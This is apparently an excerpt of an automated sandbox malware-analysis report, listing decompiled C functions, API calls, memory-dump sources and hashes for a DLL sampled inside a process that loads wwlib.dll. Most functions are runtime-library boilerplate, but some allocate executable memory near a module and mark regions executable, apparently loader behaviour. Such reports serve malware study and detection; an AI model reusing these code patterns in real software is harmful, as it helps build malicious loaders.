    					}
    				}
    			}

























    0x6d864667
    0x6d864667
    0x6d86466e
    0x6d864675
    0x6d86467a
    0x6d86467d
    0x6d864754
    0x6d864754
    0x6d864754
    0x00000000
    0x6d864683
    0x6d864688
    0x6d86468b
    0x6d86468d
    0x6d864690
    0x6d864694
    0x6d86469b
    0x6d864768
    0x6d86476d
    0x6d864775
    0x6d86477a
    0x6d86477f
    0x6d864781
    0x6d864788
    0x6d864790
    0x6d864793
    0x6d86479c
    0x6d86479f
    0x6d8647a2
    0x6d8647a9
    0x6d864818
    0x6d86481d
    0x6d864825
    0x6d86482a
    0x6d86482d
    0x6d86482f
    0x6d864840
    0x6d864840
    0x6d864844
    0x6d864847
    0x6d864853
    0x6d864853
    0x6d864860
    0x6d864862
    0x6d864865
    0x6d864867
    0x6d864872
    0x6d864877
    0x6d864879
    0x6d86487c
    0x6d86487e
    0x00000000
    0x00000000
    0x6d86487e
    0x6d864849
    0x6d864849
    0x6d86484c
    0x00000000
    0x6d86484e
    0x6d86484e
    0x6d864884
    0x6d864884
    0x6d864889
    0x6d86488e
    0x6d864890
    0x6d864893
    0x6d864896
    0x6d864898
    0x6d86489a
    0x6d86489c
    0x6d8648a1
    0x6d8648a6
    0x6d8648a8
    0x6d8648a8
    0x6d8648ae
    0x6d8648af
    0x6d8648b4
    0x6d8648ba
    0x6d8648ba
    0x6d86489a
    0x6d8648bf
    0x6d8648c1
    0x6d8648c8
    0x6d8648d2
    0x6d8648d4
    0x6d8648d7
    0x6d8648d9
    0x6d8648e5
    0x6d86490d
    0x6d86490d
    0x6d8648c3
    0x6d8648c3
    0x6d8648c6
    0x00000000
    0x00000000
    0x6d8648c6
    0x6d8648c1
    0x6d86484c
    0x6d864910
    0x6d864917
    0x6d864831
    0x6d864831
    0x6d864837
    0x00000000
    0x6d864839
    0x6d864839
    0x6d864839
    0x6d864837
    0x6d86491c
    0x6d864928
    0x6d8647ab
    0x6d8647ab
    0x6d8647b0
    0x6d8647b5
    0x6d8647ba
    0x6d8647c1
    0x6d8647c5
    0x6d8647cf
    0x6d8647db
    0x6d8647dd
    0x6d8647dd
    0x6d8647df
    0x6d8647e2
    0x6d8647e9
    0x6d8647ee
    0x00000000
    0x6d8647ee
    0x6d864783
    0x6d864783
    0x6d8647f0
    0x6d8647f3
    0x6d8647ff
    0x6d8647ff
    0x6d8646a1
    0x6d8646a1
    0x6d8646b2
    0x6d8646b9
    0x6d8646be
    0x6d8646cd
    0x6d8646d3
    0x6d8646d6
    0x6d8646eb
    0x6d8646f2
    0x6d8646fc
    0x6d8646fe
    0x6d8646fe
    0x6d8646d6
    0x6d864701
    0x6d864708
    0x6d86470f
    0x00000000
    0x6d864711
    0x6d864716
    0x6d864718
    0x6d86471b
    0x6d86471d
    0x6d864726
    0x6d864734
    0x6d86473a
    0x6d86473a
    0x6d864726
    0x6d86473c
    0x6d864744
    0x6d864744
    0x6d864756
    0x6d864759
    0x6d864765
    0x6d864765
    0x6d86469b

    APIs
    • __RTC_Initialize.LIBCMT ref: 6D8646B4
      • Part of subcall function 6D864FB0: InitializeSListHead.KERNEL32(6D8C13B0,6D8646BE,6D8754F0,00000010,6D86464F,?,?,?,6D864877,?,00000001,?,?,00000001,?,6D875538), ref: 6D864FB5
    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D86471E
    • ___scrt_fastfail.LIBCMT ref: 6D864768
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
    • String ID:
    • API String ID: 2097537958-0
    • Opcode ID: aa18295e6fee472b07c36a14768898b7de29258019b71742c5eb31468100e581
    • Instruction ID: 3d63ec116b9b3f2bc5d1c216e4e43ab4c8b753606732311b4834f96ecdad02e3
    • Opcode Fuzzy Hash: aa18295e6fee472b07c36a14768898b7de29258019b71742c5eb31468100e581
    • Instruction Fuzzy Hash: 1621F07254C2CA9ECB11ABBC982CBAC3BB19B9F73DF114C09E6502B5C2CB220104C6B5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D861610(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
    				void* _v8;
    				void* _v12;
    				struct _MEMORY_BASIC_INFORMATION _v40;
    				void* _t24;
    				void* _t29;
    				void* _t31;
    				void* _t47;
    				void* _t48;
    				void* _t49;
    				void* _t52;
    				void* _t53;
    
    				_t47 = __edi;
    				_t24 = E6D8617E0(__ecx, _a8 - 0x10000);
    				_t49 = _t48 + 4;
    				_v8 = _t24;
    				while(_v8 > _a4) {
    					_t52 = _v8 -  *0x6d877000; // 0x70000000
    					if(_t52 < 0) {
    						L5:
    						E6D865880(_t47,  &_v40, 0, 0x1c);
    						_t49 = _t49 + 0xc;
    						if(VirtualQuery(_v8,  &_v40, 0x1c) != 0) {
    							if(_v40.State != 0x10000 || _v40.RegionSize < 0x10000) {
    								_t29 = E6D8617E0(_v40.AllocationBase - 0x10000, _v40.AllocationBase - 0x10000);
    								_t49 = _t49 + 4;
    								_v8 = _t29;
    								goto L15;
    							} else {
    								_t31 = VirtualAlloc(_v8, 0x10000, 0x3000, 0x40); // executed
    								_v12 = _t31;
    								if(_v12 == 0) {
    									if(GetLastError() != 0x677) {
    										_v8 = _v8 - 0x10000;
    										L15:
    										continue;
    									}
    									return 0;
    								}
    								return _v12;
    							}
    						}
    						break;
    					}
    					_t53 = _v8 -  *0x6d877004; // 0x80000000
    					if(_t53 > 0) {
    						goto L5;
    					}
    					_v8 = _v8 - 0x8000000;
    				}
    				return 0;
    			}














    0x6d861610
    0x6d86161f
    0x6d861624
    0x6d861627
    0x6d86162a
    0x6d861639
    0x6d86163f
    0x6d86165a
    0x6d861662
    0x6d861667
    0x6d86167b
    0x6d861686
    0x6d8616dd
    0x6d8616e2
    0x6d8616e5
    0x00000000
    0x6d861691
    0x6d8616a1
    0x6d8616a6
    0x6d8616ad
    0x6d8616c0
    0x6d8616ce
    0x6d8616e8
    0x00000000
    0x6d8616e8
    0x00000000
    0x6d8616c2
    0x00000000
    0x6d8616af
    0x6d861686
    0x00000000
    0x6d86167d
    0x6d861644
    0x6d86164a
    0x00000000
    0x00000000
    0x6d861655
    0x6d861655
    0x00000000

    APIs
    • VirtualQuery.KERNEL32(00000000,6D861A3E,0000001C,?,?,?,?,6D861A3E,6D86296F,?,?,?,6D861978,6D86296F,?), ref: 6D861674
    • VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000040,00000000,6D861A3E,0000001C,?,?,?,?,6D861A3E,6D86296F,?), ref: 6D8616A1
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Virtual$AllocQuery
    • String ID:
    • API String ID: 31662377-0
    • Opcode ID: 0eabe7ac67a822a6f092b1a00ea8b4b4ca4c01cee7f2a3142a0da5b3c2a3e853
    • Instruction ID: 829406f67d723da94cf996cfaee2fbf3349f3e697bef0d990297d3aa2984acdb
    • Opcode Fuzzy Hash: 0eabe7ac67a822a6f092b1a00ea8b4b4ca4c01cee7f2a3142a0da5b3c2a3e853
    • Instruction Fuzzy Hash: C7219074D08188EFCF01DFA8D998B9E77B6EB08364F244954E205A7246D770AB80CB71
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D86987A(void* __ecx) {
    				intOrPtr _v8;
    				intOrPtr _t7;
    				void* _t8;
    				void* _t13;
    				void* _t24;
    				WCHAR* _t26;
    
    				_t26 = GetEnvironmentStringsW();
    				if(_t26 == 0) {
    					L7:
    					_t13 = 0;
    				} else {
    					_t17 = E6D869843(_t26) - _t26 >> 1;
    					_t7 = E6D869796(0, 0, _t26, E6D869843(_t26) - _t26 >> 1, 0, 0, 0, 0);
    					_v8 = _t7;
    					if(_t7 == 0) {
    						goto L7;
    					} else {
    						_t8 = E6D8683F4(_t7); // executed
    						_t24 = _t8;
    						if(_t24 == 0 || E6D869796(0, 0, _t26, _t17, _t24, _v8, 0, 0) == 0) {
    							_t13 = 0;
    						} else {
    							_t13 = _t24;
    							_t24 = 0;
    						}
    						E6D867CC2(_t24);
    					}
    				}
    				if(_t26 != 0) {
    					FreeEnvironmentStringsW(_t26);
    				}
    				return _t13;
    			}









    0x6d869889
    0x6d86988f
    0x6d8698ea
    0x6d8698ea
    0x6d869891
    0x6d86989f
    0x6d8698a5
    0x6d8698ad
    0x6d8698b2
    0x00000000
    0x6d8698b4
    0x6d8698b5
    0x6d8698ba
    0x6d8698bf
    0x6d8698df
    0x6d8698d9
    0x6d8698d9
    0x6d8698db
    0x6d8698db
    0x6d8698e2
    0x6d8698e7
    0x6d8698b2
    0x6d8698ee
    0x6d8698f1
    0x6d8698f1
    0x6d8698fd

    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 6D869883
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D8698F1
      • Part of subcall function 6D869796: WideCharToMultiByte.KERNEL32(?,00000000,6D86A4BF,00000000,00000001,6D86A44E,6D86C4B3,?,6D86A4BF,?,00000000,?,6D86C222,0000FDE9,00000000,?), ref: 6D869838
      • Part of subcall function 6D8683F4: RtlAllocateHeap.NTDLL(00000000,6D863211,00000000,?,6D8642B3,6D863211,?,6D863211,00000008,?,?,6D861249,00000000), ref: 6D868426
    • _free.LIBCMT ref: 6D8698E2
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
    • String ID:
    • API String ID: 2560199156-0
    • Opcode ID: 605de3bb6dd6e3575745cd056c928dbd4242cc61afb652fe178e27c51d612fd2
    • Instruction ID: 66b38b02c6692c65b9954bdf02044d2415e46e6e5f359a95db060379d10edc7d
    • Opcode Fuzzy Hash: 605de3bb6dd6e3575745cd056c928dbd4242cc61afb652fe178e27c51d612fd2
    • Instruction Fuzzy Hash: 3E01D4A2A056963BA71137AF5C8CC7F297DDEC7EB43110928BA14C6280EF61CD01D2B0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D8625A0() {
    				void* _v8;
    				void* _v12;
    				long _v16;
    				int _t12;
    
    				_v12 = GetCurrentProcess();
    				_t12 =  *0x6d8c1004; // 0x6caf0000
    				_v8 = _t12;
    				while(_v8 != 0) {
    					VirtualProtect(_v8, 0x10000, 0x20,  &_v16); // executed
    					_t12 = FlushInstructionCache(_v12, _v8, 0x10000);
    					_v8 =  *((intOrPtr*)(_v8 + 4));
    				}
    				return _t12;
    			}







    0x6d8625ab
    0x6d8625ae
    0x6d8625b3
    0x6d8625c1
    0x6d8625d6
    0x6d8625e8
    0x6d8625be
    0x6d8625be
    0x6d8625f2

    APIs
    • GetCurrentProcess.KERNEL32(?,?,6D863144), ref: 6D8625A6
    • VirtualProtect.KERNEL32(00000000,00010000,00000020,?), ref: 6D8625D6
    • FlushInstructionCache.KERNEL32(?,00000000,00010000,00000000,00010000,00000020,?), ref: 6D8625E8
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
    • String ID:
    • API String ID: 3733156554-0
    • Opcode ID: d40a740bd1169f6fdca215bfdab9d72eb4543623403bce15d9d0788e63c3d473
    • Instruction ID: 9c7dbbdf914b747e4d60b7c1e5b95dc10df0ce13ba56a16a46750a18edecb8db
    • Opcode Fuzzy Hash: d40a740bd1169f6fdca215bfdab9d72eb4543623403bce15d9d0788e63c3d473
    • Instruction Fuzzy Hash: EAF05E74A0424CFBCB11DBE8D959F9DB7B8AB48758F10C899FA00A7240E7719F40DBA0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: eec28a8bcc6e205f4fd953543f796613b8f898262229c6a1dc313be6403e5873
    • Instruction ID: fbe04d366ecd7b3d42aaf6b0f0962e7b153a1401f378bddfea3a5332c1a1c7b9
    • Opcode Fuzzy Hash: eec28a8bcc6e205f4fd953543f796613b8f898262229c6a1dc313be6403e5873
    • Instruction Fuzzy Hash: 3911B675E437025FE760EA7CAC88BD633DCA782730F580666F522EB1D4D7B8C4924680
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 0303ABA3: GetEnvironmentStringsW.KERNEL32 ref: 0303ABAC
      • Part of subcall function 0303ABA3: _free.LIBCMT ref: 0303AC0B
      • Part of subcall function 0303ABA3: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0303AC1A
    • _free.LIBCMT ref: 03036FBB
    • _free.LIBCMT ref: 03036FC2
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: _free$EnvironmentStrings$Free
    • String ID:
    • API String ID: 2490078468-0
    • Opcode ID: 95176481f87f784d7dc3f8f26a32233b1d63c37993201f1ed9a589cbf5b698ab
    • Instruction ID: 1438787bfef613a7fc24d45bee8f477318ce2a2a45e18b5fc413ef1cfb644b05
    • Opcode Fuzzy Hash: 95176481f87f784d7dc3f8f26a32233b1d63c37993201f1ed9a589cbf5b698ab
    • Instruction Fuzzy Hash: 73E0655AA0B6145DE661FB2DA8806AD168D5FC3230F15025BD8209B1C1DF6584061495
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D867340(void* __eax, void* __ebx, void* __ecx, void* __edx) {
    
    				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
    			}



    0x6d867345

    APIs
      • Part of subcall function 6D86987A: GetEnvironmentStringsW.KERNEL32 ref: 6D869883
      • Part of subcall function 6D86987A: _free.LIBCMT ref: 6D8698E2
      • Part of subcall function 6D86987A: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D8698F1
    • _free.LIBCMT ref: 6D867380
    • _free.LIBCMT ref: 6D867387
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$EnvironmentStrings$Free
    • String ID:
    • API String ID: 2490078468-0
    • Opcode ID: b8d04341498edc183847cb464fd1064e493cffdf5d0363a39f7158458028617b
    • Instruction ID: 576d395b11d60c8d62bf399644ede16c23ed2755f6fd99374215af7de30c9d5f
    • Opcode Fuzzy Hash: b8d04341498edc183847cb464fd1064e493cffdf5d0363a39f7158458028617b
    • Instruction Fuzzy Hash: 8FE0E512E0D99195E321A72E2E4D76D17155B82F78FA34F16EE24CA5C2EF60C40300F6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E6D86B775(void* __edi, void* __eflags) {
    				intOrPtr _v12;
    				char _t17;
    				void* _t18;
    				intOrPtr* _t32;
    				char _t35;
    				void* _t37;
    
    				_push(_t27);
    				_t17 = E6D868473(0x40, 0x38); // executed
    				_t35 = _t17;
    				_v12 = _t35;
    				if(_t35 != 0) {
    					_t2 = _t35 + 0xe00; // 0xe00
    					_t18 = _t2;
    					__eflags = _t35 - _t18;
    					if(__eflags != 0) {
    						_t3 = _t35 + 0x20; // 0x20
    						_t32 = _t3;
    						_t37 = _t18;
    						do {
    							_t4 = _t32 - 0x20; // 0x0
    							E6D869BF4(__eflags, _t4, 0xfa0, 0);
    							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
    							 *_t32 = 0;
    							_t32 = _t32 + 0x38;
    							 *((intOrPtr*)(_t32 - 0x34)) = 0;
    							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
    							 *((char*)(_t32 - 0x2c)) = 0xa;
    							 *(_t32 - 0x2b) =  *(_t32 - 0x2b) & 0x000000f8;
    							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
    							 *((char*)(_t32 - 0x26)) = 0;
    							__eflags = _t32 - 0x20 - _t37;
    						} while (__eflags != 0);
    						_t35 = _v12;
    					}
    				} else {
    					_t35 = 0;
    				}
    				E6D867CC2(0);
    				return _t35;
    			}









    0x6d86b77b
    0x6d86b782
    0x6d86b787
    0x6d86b78b
    0x6d86b792
    0x6d86b798
    0x6d86b798
    0x6d86b79e
    0x6d86b7a0
    0x6d86b7a3
    0x6d86b7a3
    0x6d86b7a6
    0x6d86b7a8
    0x6d86b7ae
    0x6d86b7b2
    0x6d86b7b7
    0x6d86b7bb
    0x6d86b7bd
    0x6d86b7c0
    0x6d86b7c6
    0x6d86b7cd
    0x6d86b7d1
    0x6d86b7d5
    0x6d86b7d8
    0x6d86b7db
    0x6d86b7db
    0x6d86b7df
    0x6d86b7e2
    0x6d86b794
    0x6d86b794
    0x6d86b794
    0x6d86b7e4
    0x6d86b7ef

    APIs
      • Part of subcall function 6D868473: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6D868208,00000001,00000364,00000008,000000FF,?,6D8642B3,6D863211,?,6D863211,00000008), ref: 6D8684B4
    • _free.LIBCMT ref: 6D86B7E4
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AllocateHeap_free
    • String ID:
    • API String ID: 614378929-0
    • Opcode ID: dc7b64ff50725548e29eca98f690a751dcb1eb3437191a371e491adcf6ad2b5c
    • Instruction ID: 006e8fa08b296be75659049727bc2476bc4d8f2fbe991753405a11e6c4732620
    • Opcode Fuzzy Hash: dc7b64ff50725548e29eca98f690a751dcb1eb3437191a371e491adcf6ad2b5c
    • Instruction Fuzzy Hash: 0901F9B26083966BC3218F5CD888A9DFBE8EB053B4F520A29F559B76C0D7706911C7B4
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0303990C
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: afe39d837db9d899bcc84d2e883624bdcfd6b05e60bfa44d08df6088dc214ce1
    • Instruction ID: a7b287fbb7049c4678b274e8afa3ed66774626797759897bcc4a42b2fa763105
    • Opcode Fuzzy Hash: afe39d837db9d899bcc84d2e883624bdcfd6b05e60bfa44d08df6088dc214ce1
    • Instruction Fuzzy Hash: 64F0E931A4332567DB61EB2B8801B9E778CFF836A0B088053A814DA190DBB4D50086F0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D868473(signed int _a4, signed int _a8) {
    				void* _t8;
    				signed int _t13;
    				signed int _t18;
    				long _t19;
    
    				_t18 = _a4;
    				if(_t18 == 0) {
    					L2:
    					_t19 = _t18 * _a8;
    					if(_t19 == 0) {
    						_t19 = _t19 + 1;
    					}
    					while(1) {
    						_t8 = RtlAllocateHeap( *0x6d8c1810, 8, _t19); // executed
    						if(_t8 != 0) {
    							break;
    						}
    						__eflags = E6D86AD52();
    						if(__eflags == 0) {
    							L8:
    							 *((intOrPtr*)(E6D866A5B(__eflags))) = 0xc;
    							__eflags = 0;
    							return 0;
    						}
    						__eflags = E6D866B7B(__eflags, _t19);
    						if(__eflags == 0) {
    							goto L8;
    						}
    					}
    					return _t8;
    				}
    				_t13 = 0xffffffe0;
    				if(_t13 / _t18 < _a8) {
    					goto L8;
    				}
    				goto L2;
    			}







    0x6d868479
    0x6d86847e
    0x6d86848c
    0x6d86848c
    0x6d868492
    0x6d868494
    0x6d868494
    0x6d8684ab
    0x6d8684b4
    0x6d8684bc
    0x00000000
    0x00000000
    0x6d86849c
    0x6d86849e
    0x6d8684c0
    0x6d8684c5
    0x6d8684cb
    0x00000000
    0x6d8684cb
    0x6d8684a7
    0x6d8684a9
    0x00000000
    0x00000000
    0x6d8684a9
    0x00000000
    0x6d8684ab
    0x6d868484
    0x6d86848a
    0x00000000
    0x00000000
    0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6D868208,00000001,00000364,00000008,000000FF,?,6D8642B3,6D863211,?,6D863211,00000008), ref: 6D8684B4
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 068df07bb216d2ad748ac9e1c8513cd8fc673a84b195bbc6d95edc2072ec5b8d
    • Instruction ID: 71f28ddd31260169993b7172591ba71f826d2e97bbb5f52a5dee57507f5f20a3
    • Opcode Fuzzy Hash: 068df07bb216d2ad748ac9e1c8513cd8fc673a84b195bbc6d95edc2072ec5b8d
    • Instruction Fuzzy Hash: D8F0B4312495A996EB129B268C0CF5B3B7CEB4B774B11C921B91C9A0C0CB20D80086F0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D8683F4(long _a4) {
    				void* _t4;
    				long _t8;
    
    				_t8 = _a4;
    				if(_t8 > 0xffffffe0) {
    					L7:
    					 *((intOrPtr*)(E6D866A5B(__eflags))) = 0xc;
    					__eflags = 0;
    					return 0;
    				}
    				if(_t8 == 0) {
    					_t8 = _t8 + 1;
    				}
    				while(1) {
    					_t4 = RtlAllocateHeap( *0x6d8c1810, 0, _t8); // executed
    					if(_t4 != 0) {
    						break;
    					}
    					__eflags = E6D86AD52();
    					if(__eflags == 0) {
    						goto L7;
    					}
    					__eflags = E6D866B7B(__eflags, _t8);
    					if(__eflags == 0) {
    						goto L7;
    					}
    				}
    				return _t4;
    			}





    0x6d8683fa
    0x6d868400
    0x6d868432
    0x6d868437
    0x6d86843d
    0x00000000
    0x6d86843d
    0x6d868404
    0x6d868406
    0x6d868406
    0x6d86841d
    0x6d868426
    0x6d86842e
    0x00000000
    0x00000000
    0x6d86840e
    0x6d868410
    0x00000000
    0x00000000
    0x6d868419
    0x6d86841b
    0x00000000
    0x00000000
    0x6d86841b
    0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(00000000,6D863211,00000000,?,6D8642B3,6D863211,?,6D863211,00000008,?,?,6D861249,00000000), ref: 6D868426
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: a743975301fba85f4a566dc94e37bf16c4c378f5dc075916cefec4dde97c7096
    • Instruction ID: 63330271c7c7f9205f6a1267c44348f97ae597bdc26dfed560eb7a9a06fa0ad9
    • Opcode Fuzzy Hash: a743975301fba85f4a566dc94e37bf16c4c378f5dc075916cefec4dde97c7096
    • Instruction Fuzzy Hash: BDE0A0212452F69BEB12176A8C0CF6B3A78EB4B3F1F528920BA6C920C0DB60C80085F0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E2FF11656(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				struct HINSTANCE__* _t10;
    				struct HINSTANCE__* _t12;
    				void* _t19;
    
    				_push(0x10);
    				_push(0x2ff116a8);
    				E2FF11310(__ebx, __edi, __esi);
    				 *(_t19 - 0x1c) = 0;
    				 *((intOrPtr*)(_t19 - 0x20)) = 0;
    				if( *0x2ff13018 != 0) {
    					L2:
    					 *((intOrPtr*)(_t19 - 4)) = 0;
    					_t10 = LoadLibraryW( *(_t19 + 8)); // executed
    					 *(_t19 - 0x1c) = _t10;
    					 *((intOrPtr*)(_t19 - 4)) = 0xfffffffe;
    					E2FF11B39(0);
    					_t12 =  *(_t19 - 0x1c);
    				} else {
    					_t12 = E2FF116C4(_t19 - 0x20); // executed
    					if(_t12 != 0) {
    						goto L2;
    					}
    				}
    				return E2FF1153C(_t12);
    			}






    0x2ff11656
    0x2ff11658
    0x2ff1165d
    0x2ff11664
    0x2ff11667
    0x2ff11670
    0x2ff1167f
    0x2ff1167f
    0x2ff11685
    0x2ff1168b
    0x2ff1168e
    0x2ff11695
    0x2ff1169a
    0x2ff11672
    0x2ff11676
    0x2ff1167d
    0x00000000
    0x00000000
    0x2ff1167d
    0x2ff116a2

    APIs
    • LoadLibraryW.KERNELBASE(?,2FF116A8,00000010,2FF115AD,wwlib.dll,2FF13074,?,2FF1159A,2FF10000,00000000,00000001,?), ref: 2FF11685
    Memory Dump Source
    • Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true
    • Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: LibraryLoad
    • String ID:
    • API String ID: 1029625771-0
    • Opcode ID: 3b8f9751846349221493e3af1705fac9153b8c842d2197db002c8e93e689f4b2
    • Instruction ID: 39da79abfcb8bff35a0efe2a10718304cba5b823f4a6c2f0971f4b5fb6a7dff2
    • Opcode Fuzzy Hash: 3b8f9751846349221493e3af1705fac9153b8c842d2197db002c8e93e689f4b2
